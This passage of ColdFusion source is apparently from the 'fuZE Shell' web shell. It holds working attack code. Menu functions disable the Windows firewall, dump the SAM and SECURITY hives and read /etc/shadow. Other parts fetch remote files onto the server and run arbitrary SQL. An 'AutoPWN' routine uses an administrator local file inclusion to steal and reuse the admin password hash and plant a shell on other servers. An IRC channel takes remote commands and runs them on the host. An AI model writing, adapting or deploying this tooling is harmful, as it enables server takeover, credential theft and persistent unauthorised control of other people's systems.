</cfloop>
</cfcase>
<!--- Windows functions --->
<!--- Each of these runs a fixed cmd.exe command with the CF service account's
      privileges and HTML-encodes stdout into the result area. The first two
      change host state (firewall off, Telnet service set to demand-start and
      started); "netsh firewall" is the pre-advfirewall syntax, so this
      targets older Windows releases. --->
<cfcase value="Disable Windows firewall"><cfexecute name="cmd.exe" arguments="/c netsh firewall set opmode disable" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="Enable Telnet service"><cfexecute name="cmd.exe" arguments="/c sc config tlntsvr start= demand & net start telnet" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="Show opened ports [W]"><cfexecute name="cmd.exe" arguments="/c netstat -aon" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<!--- Dumps the %WINDIR%\repair backup copies of the registry hives (the live
      hives under system32\config are normally locked). Binary content goes
      straight through htmleditformat into the page. --->
<cfcase value="Read SAM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SAM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="Read SECURITY"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SECURITY" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="Read SYSTEM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SYSTEM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<!--- Parses the IIS 6 metabase at a hard-coded C:\WINDOWS path and prints
      "path : bindings : log dir" for each site/virtual directory, skipping
      paths under Program Files or WINDOWS. Output here is not HTML-encoded.
      NOTE(review): the <cfreturn> in the inner cfcatch is outside any
      cffunction, which is not valid in a plain .cfm page - verify how the
      target CF version treats it; everything is wrapped in a cftry that just
      prints "Error". --->
<cfcase value="Read IIS paths">Path : Domain : LogFileDirectory
<cftry>
<cfset xmlPath=arrayNew(1)>
<cfset xmllocation=arraynew(1)>
<cfset xmlServerindings=arraynew(1)>
<cfset xmlLogFileDirectory=arraynew(1)>
<cfset Xmlbasepath="C:\WINDOWS\system32\inetsrv\MetaBase.xml">
<cftry>
<cffile action="read" file="#Xmlbasepath#" variable="XMLFileText">
<cfcatch type="any">
<cfoutput>Error reading MetaBase.xml: #cfcatch.type#</cfoutput>
<cfreturn xmlpath>
</cfcatch></cftry>
<cfset myXMLDocument=XmlParse(XMLFileText)>
<cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebServer)>
<cfloop index="i" from = "1" to = #numItems#>
<cfif findnocase("ServerBindings=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
<cfset ServerBindings = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.ServerBindings#>
<cfset location = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.location#>
<cfset arrayAppend(xmllocation,("#location#"))>
<cfset arrayAppend(xmlServerindings,("#ServerBindings#"))>
<cfif findnocase("LogFileDirectory=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
<cfset LogFileDirectory = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.LogFileDirectory#>
<cfset arrayAppend(xmlLogFileDirectory,("#LogFileDirectory#"))>
<cfelse>
<cfset arrayAppend(xmlLogFileDirectory,(""))>
</cfif></cfif></cfloop>
<cfset numLocations=arraylen(xmllocation)>
<cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebVirtualDir)>
<cfloop index="i" from = "1" to = #numItems#>
<cfif findnocase("path",#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i]#) >
<cfset path1 = #myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.path#>
<cfif findnocase("Program Files",#path1#) is 0 and findnocase("WINDOWS",#path1#) is 0>
<cfset listpath=arraytolist(xmlpath)>
<cfif find(#path1#,#listpath#) is 0>
<cfset arrayAppend(xmlpath,"#path1#")>
<cfloop index="j" from = "1" to = #numLocations#>
<cfif findnocase(#xmllocation[j]#,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.Location#) is not 0>
<cfoutput>"#path1#" : "#xmlServerindings[j]#" : "#xmlLogFileDirectory[j]#"#chr(10)#</cfoutput>
</cfif></cfloop></cfif></cfif></cfif></cfloop>
<cfcatch>Error
</cfcatch>
</cftry>
</cfcase>
<!--- Read-only host enumeration; timeouts are per command (chkdsk gets 180 s). --->
<cfcase value="View open sessions [W]"><cfexecute name="cmd.exe" arguments="/c query session" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="View local shares"><cfexecute name="cmd.exe" arguments="/c net share" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="View domain shares"><cfexecute name="cmd.exe" arguments="/c net view" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="View users"><cfexecute name="cmd.exe" arguments="/c net user" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="View running processes [W]"><cfexecute name="cmd.exe" arguments="/c tasklist" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="View system info [W]"><cfexecute name="cmd.exe" arguments="/c systeminfo" timeout="30" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value="Check disk for consistency"><cfexecute name="cmd.exe" arguments="/c chkdsk" timeout="180" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase> <!--- Shout outs to fractal! --->
  534. <!--- Linux functions --->
  535. <cfcase value="Find SUID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -04000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  536. <cfcase value="Find SGID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -02000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  537. <cfcase value="Find all *conf* files"><cfexecute name="sh" arguments="-c 'find / -type f -name *conf*'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  538. <cfcase value="Find all .*_history files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*_history'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  539. <cfcase value="Find all *.pwd files"><cfexecute name="sh" arguments="-c 'find / -type f -name *.pwd'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  540. <cfcase value="Find all .*rc files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*rc'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  541. <cfcase value="Find all writable directories and files"><cfexecute name="sh" arguments="-c 'find / -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  542. <cfcase value="Find all writable directories and files in current dir"><cfexecute name="sh" arguments="-c 'find . -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  543. <cfcase value="Read /etc/passwd"><cfexecute name="sh" arguments="-c 'cat /etc/passwd'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  544. <cfcase value="Read /etc/shadow"><cfexecute name="sh" arguments="-c 'cat /etc/shadow'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  545. <cfcase value="Read /proc/self/environ"><cfexecute name="sh" arguments="-c 'cat /proc/self/environ'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  546. <cfcase value="Show opened ports [L]"><cfexecute name="sh" arguments="-c 'netstat -a'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  547. <cfcase value="View open sessions [L]"><cfexecute name="sh" arguments="-c 'w'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  548. <cfcase value="View recent sessions"><cfexecute name="sh" arguments="-c 'last'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  549. <cfcase value="View running processes [L]"><cfexecute name="sh" arguments="-c 'ps auxww'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  550. <cfcase value="View memory info"><cfexecute name="sh" arguments="-c 'df -h;free -m'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  551. <cfcase value="View CPU info"><cfexecute name="sh" arguments="-c 'cat /proc/cpuinfo'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  552. <cfcase value="View system info [L]"><cfexecute name="sh" arguments="-c 'uname -a'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  553. <cfdefaultcase>Invalid function</cfdefaultcase>
  554. </cfswitch>
  555. <cfcatch>Error
  556. </cfcatch>
  557. </cftry>
  558. </textarea>
  559. <cfelseif isDefined("Form.decrypt_hash")>
  560. <pre>Decrypting '#htmleditformat(Form.decrypt_hash)#'</pre>
  561. <textarea class="report" rows="20">
  562. <cftry>
  563. <cfscript>
  564. dp=Decrypt(Form.decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  565. writeoutput(dp);
  566. </cfscript>
  567. <cfcatch>Invalid hash
  568. </cfcatch>
  569. </cftry>
  570. </textarea>
  571. <cfelseif isDefined("Form.Upload") and Form.Upload EQ "Upload">
  572. <pre>Uploading file to '#htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))#'</pre>
  573. <textarea class="report" rows="20">
  574. <cftry>
  575. <cffile action="upload" destination="#getDirectoryFromPath(getCurrentTemplatePath())#" filefield="Form.File" nameconflict="overwrite">File uploaded!
  576. <cfcatch>Upload failed
  577. </cfcatch>
  578. </cftry>
  579. </textarea>
  580. <cfelseif isdefined("Form.Download")>
  581. <cftry>
  582. <cfsilent>
  583. <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath(Form.Download)#">
  584. <cfcontent type="application/unknown" file="#Form.Download#">
  585. </cfsilent>
  586. <cfcatch>File is not available
  587. <cfabort>
  588. </cfcatch>
  589. </cftry>
  590. <cfelseif isDefined("Form.RUpload")>
  591. <pre>Uploading file from '#htmleditformat(Form.RUpload)#'</pre>
  592. <textarea class="report" rows="20">
  593. <cftry>
  594. <cfhttp url="#Form.RUpload#" method="get" getasbinary="yes" result="rFile" />
  595. <cffile action="write" file="#getDirectoryFromPath(getCurrentTemplatePath())##listLast(Form.RUpload,"\/")#" addNewLine="no" output="#rFile.filecontent#" />
  596. <cfoutput>File saved to #htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))##htmleditformat(listLast(Form.RUpload,"\/"))#</cfoutput>
  597. <cfcatch>Error</cfcatch>
  598. </cftry>
  599. </textarea>
  600. <cfelseif isDefined("Form.exec_sql")>
  601. <pre><cfoutput>Executing '#htmleditformat(Form.exec_sql)#' in datasource '#htmleditformat(Form.datasource)#'</cfoutput></pre>
  602. <cfquery name="sqlout" datasource="#Form.datasource#" username="#Form.db_username#" password="#Form.db_password#">
  603. #Form.exec_sql#
  604. </cfquery>
  605. <cfdump var="#sqlout#" expand="false">
  606. <cfelseif isDefined("Form.cfscan")>
  607. <pre>Scanning for CF instances over the LAN</pre>
  608. <textarea class="report" rows="20">
  609. <cftry>
  610. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  611. <cfset lic=#sf.LicenseService.runScan()#>
  612. <cfloop collection="#lic#" item="i">
  613. <cfoutput>ColdFusion #lic[i][1]['Edition']# build #lic[i][1]['Build']# at #lic[i][1]['MachineName']# (#lic[i][1]['IpAddrs']#)#chr(10)#</cfoutput>
  614. </cfloop>
  615. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  616. </cftry>
  617. </textarea>
  618. <cfelseif isDefined("Form.regpath")>
  619. <cftry>
  620. <cfif form.regpath is not "">
  621. <cfif form.entry is "">
  622. <CFREGISTRY Action="getAll"
  623. Branch="#form.regpath#"
  624. Type="Any"
  625. Name="RegQuery">
  626. <CFTABLE Query="RegQuery" colHeaders HTMLTable Border="Yes">
  627. <CFCOL Header="<B>Entry</b>" Width="35" Text="#RegQuery.Entry#">
  628. <CFCOL Header="<B>Type</b>" Width="10" Text="#RegQuery.type#">
  629. <CFCOL Header="<B>Value</b>" Width="35" Text="#RegQuery.Value#">
  630. </CFTABLE>
  631. <cfelse>
  632. <cfif form.newentry is "">
  633. <CFPARAM NAME="RegValue" DEFAULT="not found">
  634. <CFREGISTRY Action = "get" Branch = "#form.regpath#" Entry = "#form.Entry#" Type="#form.regtype#" variable = "RegValue">
  635. <cfoutput>(#form.regpath#\#form.Entry# ) values is : #RegValue#</cfoutput>
  636. <cfelse>
  637. <CFPARAM NAME="RegValue" DEFAULT="not found">
  638. <CFREGISTRY Action = "get" Branch = "#form.regpath#" Entry = "#form.Entry#" Variable = "RegValue" Type = "#form.regtype#">
  639. <cfoutput>(#form.regpath#\#form.Entry# ) old values is : #RegValue#<br /></cfoutput>
  640. <cfif regvalue is not "not found">
  641. <CFREGISTRY Action="set" Branch="#form.regpath#" Entry="#form.Entry#" Type="#form.regtype#" Value="#form.newEntry#">
  642. <cfoutput>(#form.regpath#\#form.Entry# ) new values is : #form.newEntry#</cfoutput>
  643. </cfif>
  644. </cfif>
  645. </cfif>
  646. <cfelse>Error: A registry path must be defined
  647. </cfif>
  648. <cfcatch type="any"><cfoutput>Error: #cfcatch.type#</cfoutput></cfcatch>
  649. </cftry>
  650. <cfelseif isDefined("Form.target_host")>
  651. <pre>Attempting to AutoPWN [#htmleditformat(Form.target_host)#]</pre>
  652. <cftry>
  653. <cfset target_host=Form.target_host>
  654. <textarea class="report" rows="20">
  655. ====================================================================================================
  656. [~] AutoPWN report for [<cfoutput>#HTMLEditFormat(target_host)#</cfoutput>]
  657. <cfset lfi=[
  658. <!--- Single server configuration ColdFusion --->
  659. "..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties",
  660. <!--- ColdFusion 7 --->
  661. "..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties",
  662. <!--- ColdFusion 8 --->
  663. "..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties",
  664. <!--- ColdFusion 6, 7 AND 8 --->
  665. "..\..\..\..\..\..\..\..\..\..\JRUN4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"
  666. ]>
  667. <cfset lfi_success=FALSE>
  668. <cfloop array="#lfi#" index="i">
  669. <cfhttp url="http://#target_host#/CFIDE/administrator/logging/settings.cfm?locale=#i#%00en" result="lfiresult" method="get"></cfhttp>
  670. <cfset cfadmin_hash=REReplace(REReplace(REReplace(lfiresult.Filecontent,"(.*?)password=","","ALL"),"#chr(10)#encrypted(.*?)</html>","","ALL"),"\s","","ALL")>
  671. <cfif Len(cfadmin_hash) GT 0 AND Len(cfadmin_hash) LTE 40 AND cfadmin_hash NEQ "ConnectionFailure">
  672. <cfset lfi_success=TRUE>
  673. <cfbreak>
  674. </cfif>
  675. </cfloop>
  676. <cfif lfi_success EQ TRUE>[!] LFI succeeded, hash acquired: <cfoutput>#HTMLEditFormat(cfadmin_hash)#</cfoutput>
  677. <cfelse><cfthrow message="LFI failed">
  678. </cfif>
  679. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminpage" method="get">
  680. <cfset cfadmin_salt=REReplace(Mid(adminpage.Filecontent,13,REFind("[0-9]{13}",adminpage.Filecontent)), "(.*?)salt"" type=""hidden"" value=""","","ALL")>
  681. <cfswitch expression="#Len(cfadmin_hash)#">
  682. <cfcase value="40">
  683. <cfset secretKeySpec=createObject("java","javax.crypto.spec.SecretKeySpec").init(toBinary(toBase64(cfadmin_salt)),"HmacSHA1")>
  684. <cfset mac=createObject("java","javax.crypto.Mac").getInstance("HmacSHA1")>
  685. <cfset mac.init(secretKeySpec)>
  686. <cfset encryptedBytes=mac.doFinal(toBinary(toBase64(cfadmin_hash)))>
  687. <cfset cfadmin_password=BinaryEncode(mac.doFinal(toBinary(toBase64(cfadmin_hash))),"Hex")>
  688. </cfcase>
  689. <cfdefaultcase>
  690. <!--- TODO: CF6 Auth --->
  691. <cfthrow message="CF6 authentication is unsupported">
  692. </cfdefaultcase>
  693. </cfswitch>
  694. [*] Logging in
  695. <cfset responsecookies=adminpage.Responseheader["Set-Cookie"]>
  696. <cfset cookiearray=ArrayNew(1)>
  697. <cfloop item="i" collection="#responsecookies#">
  698. <cfset cookiearray[i]=ListGetAt(responsecookies[i],1,";")>
  699. </cfloop>
  700. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminlogin" method="post" redirect="false">
  701. <cfhttpparam type="header" name="Cookie" value="#ArraytoList(cookiearray,'; ')#">
  702. <cfhttpparam type="formfield" name="cfadminUserId" value="admin">
  703. <cfhttpparam type="formfield" name="cfadminPassword" value="#cfadmin_password#">
  704. <cfhttpparam type="formfield" name="salt" value="#cfadmin_salt#">
  705. </cfhttp>
  706. <cfset authorizationcookies=adminlogin.Responseheader["Set-Cookie"]>
  707. <cfset admincookiearray=ArrayNew(1)>
  708. <cfloop item="i" collection="#authorizationcookies#">
  709. <cfset admincookiearray[i]=ListGetAt(authorizationcookies[i],1,";")>
  710. </cfloop>
  711. <cfset authkey=admincookiearray[4]>
  712. <cfhttp url="http://#target_host#/CFIDE/administrator/reports/index.cfm" result="settingssummary" method="get">
  713. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  714. </cfhttp>
  715. <cfset runtime_user=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)User Name(.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  716. <cfset cfide_path=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)#chr(9)#/CFIDE (.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  717. <cfif REFind("/",cfide_path)><cfset slash="/">
  718. <cfelse><cfset slash="\">
  719. </cfif>[*] Creating payload objects
  720. <cfset shell_name=listFirst(listLast(getCurrentTemplatePath(),"\/"),".")>
  721. <cffile action="Copy" source="#getCurrentTemplatePath()#" destination="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  722. <cfset shell_url="http://#cgi.local_addr##reverse(listRest(reverse(CGI.SCRIPT_NAME),"/"))#/#shell_name#.txt">
  723. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  724. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  725. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  726. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  727. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  728. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  729. <cfhttpparam type="formfield" name="Interval" value="Daily">
  730. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  731. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  732. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  733. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  734. <cfhttpparam type="formfield" name="ScheduledURL" value="#shell_url#">
  735. <cfhttpparam type="formfield" name="publish" value="1">
  736. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash##shell_name#.cfm">
  737. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  738. <cfhttpparam type="formfield" name="taskNameOrig" value=""> <!--- CF8- --->
  739. </cfhttp>
  740. <cfhttp url="http://#target_host#/CFIDE/#shell_name#.cfm" result="shell_status" method="get">
  741. <cfif find("&fnof;uZE Shell",shell_status.Filecontent) is not 0>[!] &fnof;uZE copied successfully
  742. <cfelse>[!] Shell not found, recreating payload to subvert firewall
  743. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  744. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  745. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  746. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  747. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  748. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  749. <cfhttpparam type="formfield" name="Interval" value="Daily">
  750. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  751. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  752. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  753. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  754. <cfhttpparam type="formfield" name="ScheduledURL" value="/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E">
  755. <cfhttpparam type="formfield" name="publish" value="1">
  756. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash#microshell.cfm">
  757. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  758. <cfhttpparam type="formfield" name="taskNameOrig" value="CFSh"> <!--- CF8- --->
  759. </cfhttp>
  760. <cfhttp url="http://#target_host#/CFIDE/microshell.cfm" result="shell_status_2" method="get">
  761. <cfif find("&##181;SH",shell_status_2.Filecontent) is not 0>[!] Firewall subversion was successful
  762. <cfelse>[!] Shell not found
  763. </cfif>
  764. </cfif>[*] Removing payload objects
  765. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduletasks.cfm?action=delete&task=CFSh" result="deletetask" method="get">
  766. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  767. <cffile action="Delete" file="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  768. </cfhttp>[~] Results:
  769. [*] Server Status: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0 OR find("&##181;SH",shell_status_2.Filecontent) NEQ 0>Compromised<cfelse>Uncompromised</cfif>
  770. [*] Access obtained: <cfoutput>#HTMLEditFormat(runtime_user)#</cfoutput>
  771. [*] Shell location: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/#shell_name#.cfm")#</cfoutput><cfelseif find("&##181;SH",shell_status_2.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/microshell.cfm")#</cfoutput><cfelse>N/A</cfif>
  772. [~] EOF
  773. ====================================================================================================</textarea>
  774. <cfcatch>[!] Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif>
  775. [~] Results:
  776. [*] Server Status: N/A
  777. [*] Access obtained: N/A
  778. [*] Shell location: N/A
  779. [~] EOF
  780. ====================================================================================================</textarea>
  781. </cfcatch>
  782. </cftry>
  783. <cfelseif isDefined("Form.nuke")>
  784. <pre>Nuking shell</pre>
  785. <textarea class="report" rows="20">
  786. <cftry>
  787. <cffile action="delete" file="#getCurrentTemplatePath()#">
  788. Shell nuked
  789. <cfcatch>Error</cfcatch>
  790. </cftry>
  791. </textarea>
  792. <cfelseif isDefined("Form.ircip") and isDefined("Form.ircport")>
  793. <pre>Connecting to #htmleditformat(Form.ircip)#:#htmleditformat(Form.ircport)#</pre>
  794. <textarea class="report" rows="20">
  795. <cftry>
  796. <cfscript>
  797. try{
  798.  
  799. // Create socket
  800. socket=createObject("java","java.net.Socket");
  801.  
  802. // Connect to remote host
  803. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.ircip,Form.ircport));
  804. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  805.  
  806. // Establish connection
  807. try{
  808. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  809. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  810. writeoutput("Connection successful!#chr(10)#");
  811. } catch (IOException e) {
  812. writeoutput("IO Exception: Read failed#chr(10)#");
  813. }
  814.  
  815. // Communicate
  816. outstream.println("NICK #Form.ircnick#");
  817. outstream.println("USER #Form.ircuname# 8 * :#Form.ircrname#");
  818. outstream.flush();
  819. while(True){
  820. str = instream.readLine();
  821. cmd = str.split(" ");
  822.  
  823. //---------------------CLIENT----------------------//
  824. if (not cmd[1] EQ "PING"){
  825. if (cmd[2] EQ "433"){
  826. writeoutput("Nickname already in use: #Form.ircnick##chr(10)#");
  827. Form.ircnick="#Form.ircnick#_";
  828. outstream.println("NICK #Form.ircnick#");
  829. outstream.flush();
  830. }
  831. else if (cmd[2] EQ "004"){
  832. writeoutput("Entered IRC#chr(10)#");
  833. outstream.println("JOIN #Form.ircchan#");
  834. outstream.flush();
  835. }
  836. else if (FindNoCase(":>",str)){
  837. command_init=str.split(":>");
  838. command=command_init[2].split(" ");
  839. switch(command[1]){
  840. //---------------------//
  841. // Commands
  842. //---------------------//
  843. // Raw
  844. case "raw":
  845. {
  846. raw_init=str.split(":>raw ");
  847. raw=raw_init[2];
  848. outstream.println("#raw#");
  849. outstream.flush();
  850. break;
  851. }
  852. //---------------------//
  853. // Decrypt
  854. case "decrypt":
  855. {
  856. decrypt_init=str.split(":>decrypt ");
  857. decrypt_hash=decrypt_init[2];
  858. channel=cmd[3];
  859. outstream.println("PRIVMSG #channel# :Decrypting '#chr(15)##decrypt_hash##chr(15)#'");
  860. outstream.flush();
  861. dp=Decrypt(decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  862. dp=replace(dp,chr(2),"\x02","ALL"); // Escape IRC bold character
  863. dp=replace(dp,chr(3),"\x03","ALL"); // Escape IRC color character
  864. dp=replace(dp,chr(7),"\x07","ALL"); // Escape IRC beep character
  865. dp=replace(dp,chr(10),"\x0A","ALL"); // Escape LF
  866. dp=replace(dp,chr(13),"\x0D","ALL"); // Escape CR
  867. dp=replace(dp,chr(15),"\x0f","ALL"); // Escape IRC no format character
  868. dp=replace(dp,chr(16),"\x16","ALL"); // Escape IRC reverse character
  869. dp=replace(dp,chr(31),"\x1f","ALL"); // Escape IRC underline character
  870. outstream.println("PRIVMSG #channel# :'#dp#'");
  871. outstream.flush();
  872. break;
  873. }
  874. //---------------------//
  875. // Execute
  876. case "exec":
  877. {
  878. exec_init=str.split(":>exec ");
  879. exec=exec_init[2].split(" ");
  880. channel=cmd[3];
  881. outstream.println("PRIVMSG #channel# :Executing '#chr(15)##exec_init[2]##chr(15)#'");
  882. outstream.flush();
  883. p = createObject("java","java.lang.ProcessBuilder").init(exec).start();
  884. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  885. br = createObject("java","java.io.BufferedReader").init(i);
  886. line=br.readLine();
  887. while (isDefined("line")) {
  888. outstream.println("PRIVMSG #channel# :> #line#");
  889. outstream.flush();
  890. line = br.readLine();
  891. }
  892. br.close();
  893. i.close();
  894. break;
  895. }
  896. //---------------------//
  897. // Help
  898. case "help":
  899. {
  900. channel=cmd[3];
  901. outstream.println("PRIVMSG #channel# :fuZE CF IRC Datapipe | Developed by XiX");
  902. outstream.println("PRIVMSG #channel# :Commands: >raw >decrypt >exec >help >exit");
  903. outstream.flush();
  904. break;
  905. }
  906. //---------------------//
  907. // Exit
  908. case "exit":
  909. {
  910. outstream.close();
  911. instream.close();
  912. socket.close();
  913. break;
  914. }
  915. //---------------------//
  916. // Invalid command
  917. default:
  918. {
  919. break;
  920. }
  921. //---------------------//
  922. }
  923. }
  924. }
  925. else {
  926. outstream.println("PONG #str.substring(5)#");
  927. outstream.flush();
  928. }
  929. //--------------------------------------------------//
  930.  
  931. }
  932.  
  933. }catch (Exception e) {
  934. writeoutput("Exception: Error#chr(10)#");
  935. }
  936. </cfscript>
  937. <cfcatch>Connection terminated</cfcatch>
  938. </cftry>
  939. </textarea>
  940. <cfelse>
  941. <pre>Waiting for input</pre>
  942. <textarea class="report" rows="20">Welcome to &fnof;uZE Shell</textarea>
  943. </cfif>
  944. </cfoutput></td><td width="25%">
  945. <div class="container">
  946. <div class="menu">
  947. <div id='nav'><a href="#execute" name="modal">:: Execute command on server ::</a></div>
  948. <div id='nav'><a href="#reverse" name="modal">:: Reverse shell ::</a></div>
  949. <div id='nav'><a href="#functions" name="modal">:: Functions ::</a></div>
  950. <div id='nav'><a href="#updown" name="modal">:: Upload/download files on server ::</a></div>
  951. <div id='nav'><a href="#runsql" name="modal">:: Run SQL query ::</a></div>
  952. <div id='nav'><a href="#registry" name="modal">:: Registry ::</a></div>
  953. <div id='nav'><a href="#edit" name="modal">:: Edit file ::</a></div>
  954. <div id='nav'><a href="#bind" name="modal">:: Bindshell ::</a></div>
  955. <div id='nav'><a href="#decrypt" name="modal">:: CF hash decrypter ::</a></div>
